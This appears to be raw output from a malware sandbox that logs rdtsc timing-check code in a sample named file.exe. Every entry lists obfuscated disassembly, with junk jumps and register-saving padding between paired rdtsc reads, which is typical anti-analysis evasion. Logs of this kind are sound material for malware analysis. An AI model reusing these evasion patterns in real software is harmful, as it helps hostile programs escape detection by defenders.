Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA0308 second address: 4DA0378 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F45A84F32FFh 0x00000009 and ax, 249Eh 0x0000000e jmp 00007F45A84F3309h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F45A84F3300h 0x0000001a or ecx, 05BF6698h 0x00000020 jmp 00007F45A84F32FBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F45A84F3305h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0260 second address: 4DB02C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F45A8838C81h 0x00000009 or ecx, 78ED6C16h 0x0000000f jmp 00007F45A8838C81h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F45A8838C80h 0x0000001b or si, 5038h 0x00000020 jmp 00007F45A8838C7Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 xchg eax, ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F45A8838C80h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB02C7 second address: 4DB02D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F32FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB02D6 second address: 4DB031B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 pushfd 0x00000006 jmp 00007F45A8838C7Bh 0x0000000b adc ecx, 5BE8A35Eh 0x00000011 jmp 00007F45A8838C89h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F45A8838C7Dh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB031B second address: 4DB032E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 mov dx, 3D6Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB032E second address: 4DB033C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A8838C7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB033C second address: 4DB0343 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 59h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0F31 second address: 4DE0F37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0F37 second address: 4DE0F60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F32FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F45A84F32FEh 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0F60 second address: 4DE0F64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0F64 second address: 4DE0F80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F3308h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0315 second address: 4DC0324 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A8838C7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0324 second address: 4DC032A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC032A second address: 4DC032E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC032E second address: 4DC0424 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F32FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d movzx eax, dx 0x00000010 push edi 0x00000011 jmp 00007F45A84F32FCh 0x00000016 pop eax 0x00000017 popad 0x00000018 push eax 0x00000019 jmp 00007F45A84F3300h 0x0000001e xchg eax, ebp 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F45A84F32FEh 0x00000026 or cx, 7588h 0x0000002b jmp 00007F45A84F32FBh 0x00000030 popfd 0x00000031 pushfd 0x00000032 jmp 00007F45A84F3308h 0x00000037 sub ax, 57E8h 0x0000003c jmp 00007F45A84F32FBh 0x00000041 popfd 0x00000042 popad 0x00000043 mov ebp, esp 0x00000045 pushad 0x00000046 jmp 00007F45A84F3304h 0x0000004b pushfd 0x0000004c jmp 00007F45A84F3302h 0x00000051 and eax, 6E417578h 0x00000057 jmp 00007F45A84F32FBh 0x0000005c popfd 0x0000005d popad 0x0000005e mov eax, dword ptr [ebp+08h] 0x00000061 jmp 00007F45A84F3306h 0x00000066 and dword ptr [eax], 00000000h 0x00000069 jmp 00007F45A84F3300h 0x0000006e and dword ptr [eax+04h], 00000000h 0x00000072 push eax 0x00000073 push edx 0x00000074 push eax 0x00000075 push edx 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0424 second address: 4DC0428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0428 second address: 4DC0445 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F3309h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0445 second address: 4DC044B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA043A second address: 4DA0492 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F45A84F3301h 0x00000009 and cx, 8DC6h 0x0000000e jmp 00007F45A84F3301h 0x00000013 popfd 0x00000014 call 00007F45A84F3300h 0x00000019 pop esi 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push ebp 0x0000001e jmp 00007F45A84F32FEh 0x00000023 mov dword ptr [esp], ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA0492 second address: 4DA04AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A8838C89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA04AF second address: 4DA04B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA04B5 second address: 4DA04B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA04B9 second address: 4DA0537 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F3303h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F45A84F3306h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F45A84F32FDh 0x0000001c adc cx, D9F6h 0x00000021 jmp 00007F45A84F3301h 0x00000026 popfd 0x00000027 pushfd 0x00000028 jmp 00007F45A84F3300h 0x0000002d add eax, 75B4C318h 0x00000033 jmp 00007F45A84F32FBh 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0E8F second address: 4DB0EA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45A8838C84h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0EA7 second address: 4DB0ED9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F32FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e jmp 00007F45A84F3306h 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0ED9 second address: 4DB0EDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0EDF second address: 4DB0EE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0EE5 second address: 4DB0EE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0176 second address: 4DC017C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC017C second address: 4DC0180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE07D7 second address: 4DE07FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F32FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F45A84F3305h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE07FE second address: 4DE0804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0804 second address: 4DE0808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0808 second address: 4DE0830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F45A8838C86h 0x0000000e xchg eax, ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov cx, dx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0830 second address: 4DE0835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0835 second address: 4DE083B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE083B second address: 4DE083F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE083F second address: 4DE08C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [76FB65FCh] 0x0000000d jmp 00007F45A8838C7Ah 0x00000012 test eax, eax 0x00000014 pushad 0x00000015 mov eax, 1CA0191Dh 0x0000001a call 00007F45A8838C7Ah 0x0000001f push eax 0x00000020 pop ebx 0x00000021 pop esi 0x00000022 popad 0x00000023 je 00007F461A98BD70h 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F45A8838C83h 0x00000030 add al, 0000003Eh 0x00000033 jmp 00007F45A8838C89h 0x00000038 popfd 0x00000039 mov bx, si 0x0000003c popad 0x0000003d mov ecx, eax 0x0000003f jmp 00007F45A8838C7Ah 0x00000044 xor eax, dword ptr [ebp+08h] 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F45A8838C7Ch 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE08C5 second address: 4DE090B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F32FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c jmp 00007F45A84F3306h 0x00000011 ror eax, cl 0x00000013 jmp 00007F45A84F3300h 0x00000018 leave 0x00000019 pushad 0x0000001a mov ecx, 402B470Dh 0x0000001f push eax 0x00000020 push edx 0x00000021 movzx ecx, bx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE090B second address: 4DE0957 instructions: 0x00000000 rdtsc 0x00000002 call 00007F45A8838C85h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b retn 0004h 0x0000000e nop 0x0000000f mov esi, eax 0x00000011 lea eax, dword ptr [ebp-08h] 0x00000014 xor esi, dword ptr [00472014h] 0x0000001a push eax 0x0000001b push eax 0x0000001c push eax 0x0000001d lea eax, dword ptr [ebp-10h] 0x00000020 push eax 0x00000021 call 00007F45AD1E94DFh 0x00000026 push FFFFFFFEh 0x00000028 jmp 00007F45A8838C87h 0x0000002d pop eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F45A8838C80h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0957 second address: 4DE0966 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F32FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0966 second address: 4DE0978 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 368Ah 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ret 0x0000000b nop 0x0000000c push eax 0x0000000d call 00007F45AD1E9520h 0x00000012 mov edi, edi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0978 second address: 4DE09AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F45A84F32FFh 0x0000000a adc ch, FFFFFFDEh 0x0000000d jmp 00007F45A84F3309h 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE09AA second address: 4DE09B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE09B0 second address: 4DE09B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90019 second address: 4D9002B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov eax, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9002B second address: 4D90030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90030 second address: 4D900F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F45A8838C88h 0x00000009 add eax, 381CF668h 0x0000000f jmp 00007F45A8838C7Bh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F45A8838C88h 0x0000001b jmp 00007F45A8838C85h 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 mov dword ptr [esp], ebp 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F45A8838C7Ch 0x0000002e xor ecx, 22634B28h 0x00000034 jmp 00007F45A8838C7Bh 0x00000039 popfd 0x0000003a mov si, D81Fh 0x0000003e popad 0x0000003f mov ebp, esp 0x00000041 jmp 00007F45A8838C82h 0x00000046 and esp, FFFFFFF8h 0x00000049 jmp 00007F45A8838C80h 0x0000004e xchg eax, ecx 0x0000004f jmp 00007F45A8838C80h 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 mov ebx, ecx 0x0000005a mov ch, 3Bh 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D900F9 second address: 4D900FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D900FF second address: 4D90103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90103 second address: 4D9012D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F32FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d mov ax, 921Dh 0x00000011 movzx esi, di 0x00000014 popad 0x00000015 push ebx 0x00000016 pushad 0x00000017 mov bl, al 0x00000019 popad 0x0000001a mov dword ptr [esp], ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9012D second address: 4D90131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90131 second address: 4D90135 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90135 second address: 4D9013B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9013B second address: 4D90168 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F45A84F3305h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebx, dword ptr [ebp+10h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F45A84F32FDh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90168 second address: 4D9016E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9016E second address: 4D90172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90172 second address: 4D90176 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90176 second address: 4D90196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F45A84F3301h 0x00000011 push esi 0x00000012 pop edi 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90196 second address: 4D90243 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A8838C7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F45A8838C7Ch 0x00000013 and ah, FFFFFFF8h 0x00000016 jmp 00007F45A8838C7Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F45A8838C88h 0x00000022 jmp 00007F45A8838C85h 0x00000027 popfd 0x00000028 popad 0x00000029 mov esi, dword ptr [ebp+08h] 0x0000002c jmp 00007F45A8838C7Eh 0x00000031 xchg eax, edi 0x00000032 jmp 00007F45A8838C80h 0x00000037 push eax 0x00000038 pushad 0x00000039 mov cx, dx 0x0000003c mov ebx, 15707700h 0x00000041 popad 0x00000042 xchg eax, edi 0x00000043 pushad 0x00000044 push edx 0x00000045 call 00007F45A8838C80h 0x0000004a pop esi 0x0000004b pop edx 0x0000004c mov bx, cx 0x0000004f popad 0x00000050 test esi, esi 0x00000052 pushad 0x00000053 push ecx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90243 second address: 4D9024B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9024B second address: 4D9025D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 je 00007F461A9D703Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9025D second address: 4D90263 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90263 second address: 4D90269 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90269 second address: 4D9026D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9026D second address: 4D90321 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A8838C88h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F45A8838C7Eh 0x00000019 sub si, 7538h 0x0000001e jmp 00007F45A8838C7Bh 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007F45A8838C88h 0x0000002a add ecx, 3463EF98h 0x00000030 jmp 00007F45A8838C7Bh 0x00000035 popfd 0x00000036 popad 0x00000037 je 00007F461A9D6FC2h 0x0000003d jmp 00007F45A8838C86h 0x00000042 mov edx, dword ptr [esi+44h] 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 mov edi, 68473010h 0x0000004d call 00007F45A8838C89h 0x00000052 pop ecx 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90321 second address: 4D90397 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a or edx, dword ptr [ebp+0Ch] 0x0000000d pushad 0x0000000e mov cx, C121h 0x00000012 mov edx, ecx 0x00000014 popad 0x00000015 test edx, 61000000h 0x0000001b jmp 00007F45A84F3308h 0x00000020 jne 00007F461A69162Ah 0x00000026 jmp 00007F45A84F3300h 0x0000002b test byte ptr [esi+48h], 00000001h 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F45A84F32FDh 0x00000038 add ah, 00000006h 0x0000003b jmp 00007F45A84F3301h 0x00000040 popfd 0x00000041 mov ch, DBh 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90397 second address: 4D903B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A8838C7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F461A9D6F72h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D903B1 second address: 4D903B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D903B5 second address: 4D903BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80737 second address: 4D8073B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D8073B second address: 4D8073F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D8073F second address: 4D80745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80745 second address: 4D8078C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A8838C7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007F45A8838C7Eh 0x00000010 pushfd 0x00000011 jmp 00007F45A8838C82h 0x00000016 or ax, AA68h 0x0000001b jmp 00007F45A8838C7Bh 0x00000020 popfd 0x00000021 pop ecx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D8078C second address: 4D807AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F45A84F3307h 0x0000000f rdtsc
